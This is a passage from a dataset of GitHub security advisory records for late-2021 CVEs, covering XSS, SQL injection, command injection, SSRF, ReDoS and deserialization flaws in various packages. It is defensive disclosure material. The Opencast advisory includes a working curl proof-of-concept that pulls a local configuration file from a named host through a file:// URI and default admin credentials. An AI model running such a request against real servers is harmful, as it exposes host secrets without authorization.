'WEB', 'url': 'https://github.com/Elgg/Elgg/pull/13791'}, {'type': 'WEB', 'url': 'https://github.com/elgg/elgg/commit/572d210e2392f1fdf47ff2f38665372a6535c126'}, {'type': 'PACKAGE', 'url': 'https://github.com/Elgg/Elgg'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/1f43f11e-4bd8-451f-a244-dc9541cdc0ac'}]","{'cwe_ids': ['CWE-359'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-12-06T22:01:08Z', 'nvd_published_at': '2021-12-03T15:15:00Z'}" +1.4.0,GHSA-8qv8-fq5w-p966,2021-12-16T14:09:58Z,2021-12-16T14:26:00Z,,['CVE-2021-4097'],phpservermon is vulnerable to CRLF Injection,phpservermon is vulnerable to Improper Neutralization of CRLF Sequences.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'phpservermon/phpservermon'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '3.5.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-4097'}, {'type': 'WEB', 'url': 'https://github.com/phpservermon/phpservermon/commit/162bba0046fcda1580f4fbc7b9ababe3c7c13ce4'}, {'type': 'PACKAGE', 'url': 'https://github.com/phpservermon/phpservermon'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/d617ced7-be06-4e34-9db0-63d45c003a43'}]","{'cwe_ids': ['CWE-93'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-12-14T15:10:46Z', 'nvd_published_at': '2021-12-12T00:15:00Z'}" +1.4.0,GHSA-273r-rm8g-7f3x,2021-12-13T20:20:28Z,2021-12-13T21:33:04Z,,['CVE-2021-43801'],Uncaught Exception in mercurius,"### Impact + +Any users from Mercurius@8.10.0 to 8.11.1 are subjected to a denial of service attack by sending a malformed JSON to `/graphql` unless they are using a custom error handler. + +### Patches + +The vulnerability has been fixed in https://github.com/mercurius-js/mercurius/pull/678 and shipped as v8.11.2. + +### Workarounds + +Use a custom error handler. + +### References + +See https://github.com/mercurius-js/mercurius/issues/677 + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in https://github.com/mercurius-js/mercurius +* Email us at [hello@matteocollina.com](mailto:hello@matteocollina.com) +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'mercurius'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.10.0'}, {'fixed': '8.11.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/mercurius-js/mercurius/security/advisories/GHSA-273r-rm8g-7f3x'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-43801'}, {'type': 'WEB', 'url': 'https://github.com/mercurius-js/mercurius/issues/677'}, {'type': 'WEB', 'url': 'https://github.com/mercurius-js/mercurius/pull/678/commits/732b2f895312da8deadd7b173dcd2d141d54b223'}, {'type': 'PACKAGE', 'url': 'https://github.com/mercurius-js/mercurius'}]","{'cwe_ids': ['CWE-754'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-12-13T20:20:28Z', 'nvd_published_at': '2021-12-13T20:15:00Z'}" +1.4.0,GHSA-4gwh-2pqx-f5cc,2023-09-19T10:06:45Z,2021-12-03T20:48:42Z,,['CVE-2021-44277'],Cross-site Scripting in LibreNMS,LibreNMS 21.11.0 is affected by is affected by a Cross Site Scripting (XSS) vulnerability in includes/html/common/alert-log.inc.php.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'librenms/librenms'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '21.11.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-44277'}, {'type': 'WEB', 'url': 'https://github.com/librenms/librenms/pull/13554'}, {'type': 'WEB', 'url': 'https://github.com/librenms/librenms/pull/13554/commits/fff7b45a7599f8f13a55250dc5f2b957f3394194'}, {'type': 'PACKAGE', 'url': 'https://github.com/librenms/librenms/'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-12-02T18:56:32Z', 'nvd_published_at': '2021-12-01T14:15:00Z'}" +1.4.0,GHSA-m6x4-97wx-4q27,2022-02-08T21:38:27Z,2021-12-09T19:16:26Z,,['CVE-2020-36184'],Unsafe Deserialization in jackson-databind,"FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.tomcat.dbcp.dbcp2.datasources.PerUserPoolDataSource.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.fasterxml.jackson.core:jackson-databind'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.9.10.8'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36184'}, {'type': 'WEB', 'url': 'https://github.com/FasterXML/jackson-databind/issues/2998'}, {'type': 'WEB', 'url': 'https://github.com/FasterXML/jackson-databind/commit/567194c53ae91f0a14dc27239afb739b1c10448a'}, {'type': 'WEB', 'url': 'https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062'}, {'type': 'PACKAGE', 'url': 'https://github.com/FasterXML/jackson-databind'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210205-0005/'}, {'type': 'WEB', 'url': 'https://www.oracle.com//security-alerts/cpujul2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuApr2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}]","{'cwe_ids': ['CWE-502'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-18T23:30:19Z', 'nvd_published_at': '2021-01-06T23:15:00Z'}" +1.4.0,GHSA-cfqj-9g2g-w7q6,2022-08-11T14:51:18Z,2021-12-02T17:49:14Z,,['CVE-2021-40369'],Apache JSPWiki Cross-site Scripting due to carefully crafted plugin link invocation,"A carefully crafted plugin link invocation could trigger an XSS vulnerability on Apache JSPWiki, related to the Denounce plugin, which could allow the attacker to execute javascript in the victim's browser and get some sensitive information about the victim. Apache JSPWiki users should upgrade to 2.11.0 or later.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.jspwiki:jspwiki-main'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.11.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-40369'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/jspwiki'}, {'type': 'WEB', 'url': 'https://jspwiki-wiki.apache.org/Wiki.jsp?page=CVE-2021-40369'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/r2j00nrnpjgcmoxvlv3pgfoq9kzrcsfh'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2022/08/03/3'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-25T00:20:27Z', 'nvd_published_at': '2021-11-24T12:15:00Z'}" +1.4.0,GHSA-rf3m-mhv7-x39f,2023-02-13T18:18:48Z,2021-12-20T16:58:22Z,,['CVE-2015-5250'],Denial of Service in OpenShift Origin,The API server in OpenShift Origin 1.0.5 allows remote attackers to cause a denial of service (master process crash) via crafted JSON data,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/openshift/origin'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.6'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2015-5250'}, {'type': 'WEB', 'url': 'https://github.com/openshift/origin/issues/4374'}, {'type': 'WEB', 'url': 'https://github.com/openshift/origin/commit/dace5075e31b74703e944b6b3ebe8836be8d1b9a'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2015:1736'}, {'type': 'WEB', 'url': 'https://access.redhat.com/security/cve/CVE-2015-5250'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=1259867'}, {'type': 'WEB', 'url': 'https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5250'}]","{'cwe_ids': ['CWE-20'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-19T22:21:13Z', 'nvd_published_at': '2015-09-08T15:59:00Z'}" +1.4.0,GHSA-7q9f-x6rm-qmxr,2022-02-24T18:19:11Z,2021-12-09T19:27:46Z,,['CVE-2020-7635'],Command Injection in compass-compile,compass-compile through 0.0.1 is vulnerable to Command Injection. It allows execution of arbitrary commands via the options argument.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'compass-compile'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.0.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7635'}, {'type': 'PACKAGE', 'url': 'https://github.com/quaertym/compass-compile'}, {'type': 'WEB', 'url': 'https://github.com/quaertym/compass-compile/blob/master/lib/compass.js#L25'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-COMPASSCOMPILE-564429'}]","{'cwe_ids': ['CWE-74'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-05-25T15:32:23Z', 'nvd_published_at': '2020-04-06T13:15:00Z'}" +1.4.0,GHSA-f34m-x9pj-62vq,2021-12-01T14:34:05Z,2021-12-01T18:29:02Z,,['CVE-2021-43785'],Cross-Site Scripting Vulnerability in @joeattardi/emoji-button,"### Impact + +There are two vectors for XSS attacks with versions of @joeattardi/emoji-button before 4.6.2: + +- A URL for a custom emoji +- An i18n string + +In both of these cases, a value can be crafted such that it can insert a `script` tag into the page and execute malicious code. + +### Patches + +This vulnerability is fixed starting in version 4.6.2. This is resolved by properly escaping strings that are inserted into the HTML document. + +### Workarounds + +There is no workaround other than upgrading to a non-vulnerable version. + +### Credit + +This issue was discovered by GitHub team member [@erik-krogh (Erik Krogh Kristensen)](https://github.com/erik-krogh) and was reported by the GitHub Security Lab team.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': '@joeattardi/emoji-button'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.6.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/joeattardi/emoji-button/security/advisories/GHSA-f34m-x9pj-62vq'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-43785'}, {'type': 'WEB', 'url': 'https://github.com/joeattardi/emoji-button/commit/05970c09180cd27fff493e998ac5bf0468b1bb16'}, {'type': 'WEB', 'url': 'https://github.com/joeattardi/emoji-button/commit/fe54bef107eb3f74873a4018f2ff49fa124c6a2e'}, {'type': 'PACKAGE', 'url': 'https://github.com/joeattardi/emoji-button'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-29T20:21:36Z', 'nvd_published_at': '2021-11-26T19:15:00Z'}" +1.4.0,GHSA-v6rh-hp5x-86rv,2022-02-14T22:20:29Z,2021-12-09T19:09:37Z,,['CVE-2021-44420'],Potential bypass of an upstream access control based on URL paths in Django,"In Django 2.2 before 2.2.25, 3.1 before 3.1.14, and 3.2 before 3.2.10, HTTP requests for URLs with trailing newlines could bypass upstream access control based on URL paths. This issue has low severity, according to the Django security policy.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'Django'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.2.25'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'Django'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0'}, {'fixed': '3.1.14'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'Django'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.2'}, {'fixed': '3.2.10'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-44420'}, {'type': 'WEB', 'url': 'https://github.com/django/django/commit/d4dcd5b9dd9e462fec8220e33e3e6c822b7e88a6'}, {'type': 'WEB', 'url': 'https://docs.djangoproject.com/en/3.2/releases/security/'}, {'type': 'PACKAGE', 'url': 'https://github.com/django/django'}, {'type': 'WEB', 'url': 'https://groups.google.com/forum/#!forum/django-announce'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/B4SQG2EAF4WCI2SLRL6XRDJ3RPK3ZRDV/'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20211229-0006/'}, {'type': 'WEB', 'url': 'https://www.djangoproject.com/weblog/2021/dec/07/security-releases/'}, {'type': 'WEB', 'url': 'https://www.openwall.com/lists/oss-security/2021/12/07/1'}]","{'cwe_ids': ['CWE-287'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-12-09T17:35:08Z', 'nvd_published_at': '2021-12-08T00:15:00Z'}" +1.4.0,GHSA-59g4-hpg3-3gcp,2022-01-04T18:53:43Z,2021-12-14T21:44:03Z,,['CVE-2021-43821'],Files Accessible to External Parties in Opencast,"Opencast before version 10.6 allows references to local file URLs in ingested media packages, allowing attackers to include local files from Opencast's host machines and making them available via the web interface. + +### Impact + +Before Opencast 10.6, Opencast would [open and include local files during ingests](https://github.com/opencast/opencast/blob/69952463971cf578363e3b97d8edaf334ff51253/modules/ingest-service-impl/src/main/java/org/opencastproject/ingest/impl/IngestServiceImpl.java#L1587). Attackers could exploit this to include most local files the process has read access to, extracting secrets from the host machine. + +For example, to expose the `custom.properties` of develop.opencast.org via the asset manager, an attacker could have run: + +``` +curl -f -i -u admin:opencast \ + https://develop.opencast.org/ingest/addMediaPackage/fast \ + -F 'flavor=presenter/source'\ + -F mediaUri=file:///srv/opencast/opencast-dist-allinone/etc/custom.properties\ + -F title=""custom.properties"" +``` + +An attacker would need to have the privileges required to add new media to exploit this. But these are often widely given. + + +### Patches + +The issue has been fixed in Opencast 10.6 and 11.0. + +### Workarounds + +You can mitigate this issue by narrowing down the read access Opencast has to files on the file system using UNIX permissions or mandatory access control systems like SELinux. This cannot prevent access to files Opencast needs to read though and we highly recommend updating. + +### References + +- [Example of problematic code](https://github.com/opencast/opencast/blob/69952463971cf578363e3b97d8edaf334ff51253/modules/ingest-service-impl/src/main/java/org/opencastproject/ingest/impl/IngestServiceImpl.java#L1587). +- [Patch fixing the issue](https://github.com/opencast/opencast/commit/65c46b9d3e8f045c544881059923134571897764) + +### For more information + +If you have any questions or comments about this advisory: +* Open an issue in [our issue tracker](https://github.com/opencast/opencast/issues) +* Email us at [security@opencast.org](mailto:security@opencast.org) +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.opencastproject:opencast-ingest-service-impl'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '10.6'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/opencast/opencast/security/advisories/GHSA-59g4-hpg3-3gcp'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-43821'}, {'type': 'WEB', 'url': 'https://github.com/opencast/opencast/commit/65c46b9d3e8f045c544881059923134571897764'}, {'type': 'PACKAGE', 'url': 'https://github.com/opencast/opencast'}, {'type': 'WEB', 'url': 'https://github.com/opencast/opencast/blob/69952463971cf578363e3b97d8edaf334ff51253/modules/ingest-service-impl/src/main/java/org/opencastproject/ingest/impl/IngestServiceImpl.java#L1587'}, {'type': 'WEB', 'url': 'https://mvnrepository.com/artifact/org.opencastproject/opencast-ingest-service-impl'}]","{'cwe_ids': ['CWE-552'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-12-14T19:29:54Z', 'nvd_published_at': '2021-12-14T20:15:00Z'}" +1.4.0,GHSA-9c5c-5j4h-8q2c,2022-08-11T18:45:55Z,2021-12-16T19:40:26Z,,['CVE-2021-4119'],BookStack is vulnerable to Improper Access Control.,"BookStack prior to version 21.11.3 is vulnerable to Improper Access Control. A logged-in user with no privileges OR guest user (if public access enabled) can access the /search/users/select AJAX endpoint meant for admins to manage audit logs, to dump all usernames existing in the Bookstack database. This can also be used to harvest email belonging to a user because BookStack also uses the code where(`email`, `like`, `%` . $search . `%`) to search for users based on email.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'ssddanbrown/bookstack'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '21.11.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-4119'}, {'type': 'WEB', 'url': 'https://github.com/bookstackapp/bookstack/commit/e765e618547c92f4e0b46caca6fb91f0174efd99'}, {'type': 'WEB', 'url': 'https://github.com/BookStackApp/BookStack/releases/tag/v21.11.3'}, {'type': 'PACKAGE', 'url': 'https://github.com/bookstackapp/bookstack'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/135f2d7d-ab0b-4351-99b9-889efac46fca'}]","{'cwe_ids': ['CWE-284'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-12-16T15:36:38Z', 'nvd_published_at': '2021-12-15T20:15:00Z'}" +1.4.0,GHSA-j377-2x76-558h,2022-05-04T03:12:57Z,2021-12-10T17:25:21Z,,['CVE-2021-36716'],Improper Input Validation in is-email,is-email helps validate an email address. A ReDoS (regular expression denial of service) flaw was found in the Segment is-email package before 1.0.1 for Node.js. An attacker that is able to provide crafted input to the isEmail(input) function may cause an application to consume an excessive amount of CPU.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'is-email'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-36716'}, {'type': 'PACKAGE', 'url': 'https://github.com/segmentio/is-email'}, {'type': 'WEB', 'url': 'https://github.com/segmentio/is-email/releases'}, {'type': 'WEB', 'url': 'https://segment.com/docs/release_notes/2021-07-13-cve-2021-36716/'}]","{'cwe_ids': ['CWE-20', 'CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-07-15T18:43:45Z', 'nvd_published_at': '2021-07-14T16:15:00Z'}" +1.4.0,GHSA-wf5p-f5xr-c4jj,2021-12-01T21:03:52Z,2021-12-02T17:48:53Z,,['CVE-2021-44427'],SQL Injection in rosariosis,"An unauthenticated SQL Injection vulnerability in Rosario Student Information System (aka rosariosis) before 8.1.1 allows remote attackers to execute PostgreSQL statements (e.g., SELECT, INSERT, UPDATE, and DELETE) through /Side.php via the syear parameter.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'francoisjacquet/rosariosis'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '8.1.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-44427'}, {'type': 'WEB', 'url': 'https://github.com/francoisjacquet/rosariosis/commit/e001430aa9fb53d2502fb6f036f6c51c578d2016'}, {'type': 'PACKAGE', 'url': 'https://github.com/francoisjacquet/rosariosis'}, {'type': 'WEB', 'url': 'https://gitlab.com/francoisjacquet/rosariosis/-/commit/e001430aa9fb53d2502fb6f036f6c51c578d2016'}, {'type': 'WEB', 'url': 'https://gitlab.com/francoisjacquet/rosariosis/-/issues/328'}, {'type': 'WEB', 'url': 'https://gitlab.com/francoisjacquet/rosariosis/blob/mobile/CHANGES.md#changes-in-811'}]","{'cwe_ids': ['CWE-89'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-12-01T21:03:52Z', 'nvd_published_at': '2021-11-29T22:15:00Z'}" +1.4.0,GHSA-7rpc-9m88-cf9w,2021-12-01T14:32:13Z,2021-12-01T18:29:42Z,,['CVE-2021-41243'],OS Command Injection Vulnerability and Potential Zip Slip Vulnerability in baserCMS,"There is an OS Command Injection Vulnerability on the management system of baserCMS. + +This is a vulnerability that needs to be addressed when the management system is used by an unspecified number of users. +If you are eligible, please update to the new version as soon as possible. + +Target +baserCMS 4.5.3 and earlier versions + +Vulnerability +OS Command Injection Vulnerability. + +Countermeasures +Update to the latest version of baserCMS + +Credits +Akagi Yusuke @NTT-ME","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'baserproject/basercms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.5.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/baserproject/basercms/security/advisories/GHSA-7rpc-9m88-cf9w'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41243'}, {'type': 'WEB', 'url': 'https://github.com/baserproject/basercms/commit/9088b99c329d1faff3a2f1269f37b9a9d8d5f6ff'}, {'type': 'PACKAGE', 'url': 'https://github.com/baserproject/basercms'}]","{'cwe_ids': ['CWE-78'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-11-29T19:12:04Z', 'nvd_published_at': '2021-11-26T18:15:00Z'}" +1.4.0,GHSA-6w9p-88qg-p3g3,2023-08-31T15:31:45Z,2021-12-03T20:44:48Z,,['CVE-2021-25967'],Cross-site Scripting in CKAN,"In CKAN, versions 2.9.0 to 2.9.3 are affected by a stored XSS vulnerability via SVG file upload of users’ profile picture. This allows low privileged application users to store malicious scripts in their profile picture. These scripts are executed in a victim’s browser when they open the malicious profile picture","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'ckan'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.9.0'}, {'fixed': '2.10.0'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.9.3'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-25967'}, {'type': 'WEB', 'url': 'https://github.com/ckan/ckan/pull/6477'}, {'type': 'WEB', 'url': 'https://github.com/ckan/ckan/commit/5a46989c0a4f2c2873ca182c196da83b82babd25'}, {'type': 'PACKAGE', 'url': 'https://github.com/ckan/ckan'}, {'type': 'WEB', 'url': 'https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25967'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-12-02T20:23:05Z', 'nvd_published_at': '2021-12-01T14:15:00Z'}" +1.4.0,GHSA-wjqc-j537-j9gj,2022-08-30T17:34:55Z,2021-12-08T00:01:44Z,,['CVE-2021-44685'],Command injection in git-it-electron,"Git-it through 4.4.0 allows OS command injection at the Branches Aren't Just For Birds challenge step. During the verification process, it attempts to run the reflog command followed by the current branch name (which is not sanitized for execution).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'git-it-electron'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '4.3.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-44685'}, {'type': 'WEB', 'url': 'https://github.com/dwisiswant0/advisory/issues/3'}, {'type': 'WEB', 'url': 'https://advisory.dw1.io/3'}, {'type': 'PACKAGE', 'url': 'https://github.com/jlord/git-it-electron'}, {'type': 'WEB', 'url': 'https://github.com/jlord/git-it-electron/releases'}]","{'cwe_ids': ['CWE-78'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-12-09T17:57:55Z', 'nvd_published_at': '2021-12-07T00:15:00Z'}" +1.4.0,GHSA-r8j5-h5cx-65gg,2021-12-10T19:02:24Z,2021-12-10T19:02:37Z,,['CVE-2021-29059'],ReDOS in IS-SVG,A vulnerability was discovered in IS-SVG version 4.3.1 and below where a Regular Expression Denial of Service (ReDOS) occurs if the application is provided and checks a crafted invalid SVG string.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'is-svg'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.1.0'}, {'fixed': '4.3.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29059'}, {'type': 'WEB', 'url': 'https://github.com/sindresorhus/is-svg/commit/732fc72779840c45a30817d3fe28e12058592b02'}, {'type': 'PACKAGE', 'url': 'https://github.com/sindresorhus/is-svg'}, {'type': 'WEB', 'url': 'https://github.com/sindresorhus/is-svg/releases/tag/v4.3.0'}, {'type': 'WEB', 'url': 'https://github.com/yetingli/PoCs/blob/main/CVE-2021-29059/IS-SVG.md'}, {'type': 'WEB', 'url': 'https://github.com/yetingli/SaveResults/blob/main/js/is-svg.js'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/is-svg'}]","{'cwe_ids': ['CWE-770'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-06-22T15:40:38Z', 'nvd_published_at': '2021-06-21T16:15:00Z'}" +1.4.0,GHSA-553q-hpvp-q8pc,2021-12-07T21:24:53Z,2021-12-10T20:22:15Z,,['CVE-2021-4075'],Server-Side Request Forgery in snipe/snipe-it,"Admin users on the external network can perform blind POST-based SSRF (issue requests on behalf of the server into the internal network) via the Slack Integration. This vulnerability is capable of port-scanning of the internal network, issue POST requests to web servers on the internal network which can be escalated to higher-impact.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'snipe/snipe-it'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.0.0-GM'}]}], 'database_specific': {'last_known_affected_version_range': '<= 5.3.3'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-4075'}, {'type': 'WEB', 'url': 'https://github.com/snipe/snipe-it/commit/4612b9e711b3ff5d2bcddbec5b18866d25f8e34e'}, {'type': 'PACKAGE', 'url': 'https://github.com/snipe/snipe-it'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/4386fd8b-8c80-42bb-87b8-b506c46597de'}]","{'cwe_ids': ['CWE-918'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-12-07T21:24:53Z', 'nvd_published_at': '2021-12-06T21:15:00Z'}" +1.4.0,GHSA-8w3x-r6x7-c5r5,2021-12-14T14:44:34Z,2021-12-16T14:28:27Z,,['CVE-2021-4084'],Cross-site Scripting in pimcore,pimcore is vulnerable to Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'),"[{'type': 'CVSS_V3', 'score': 